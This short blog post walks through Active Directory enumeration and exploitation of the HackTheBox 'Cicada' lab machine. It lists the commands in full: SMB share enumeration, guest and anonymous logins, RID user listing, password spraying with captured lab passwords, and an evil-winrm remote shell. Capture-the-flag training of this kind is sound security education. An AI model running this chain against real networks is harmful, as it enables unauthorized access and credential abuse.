Active Directory Enumeration: Ethical Hacking

Let's hack Active Directory by using the HackTheBox Cicada server. We will focus on enumerating and exploiting the Active Directory and not completing the Capture The Flag challenge. Here's the commands I used to walk through the challenge: enum4linux -A 10.10.11.35 enum4linux -A 10.10.11.35 -u guest smbmap -u guest -H 10.10.11.35 smbclient -L 10.10.11.35 –no-pass smbclient //10.10.11.35/HR #anonymous login #Download and enumerate files impacket-lookupsid ‘cicada.htb/guest’@10.10.11.35 -no-pass #password spray captured default passwd to all users crackmapexec smb cicada.htb -u michael.wrightson -p ‘Cicada$M6Corpb*@Lp#nZp!8’ –users crackmapexec smb cicada.htb -u michael.wrightson -p ‘Cicada$M6Corpb*@Lp#nZp!8’ –shares crackmapexec smb cicada.htb -u david.orelious -p ‘aRt$Lp#7t*VQ!3’ –shares smbclient //10.10.11.35/DEV -U david.orelious #Download and enumerate files evil-winrm -i 10.10.11.35 -u emily.oscars Also, here's a great cheatsheet to check out: https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/ Make sure to check out https://Pentest.TV for additional resources, including free ethical hacking courses. Happy Hacking!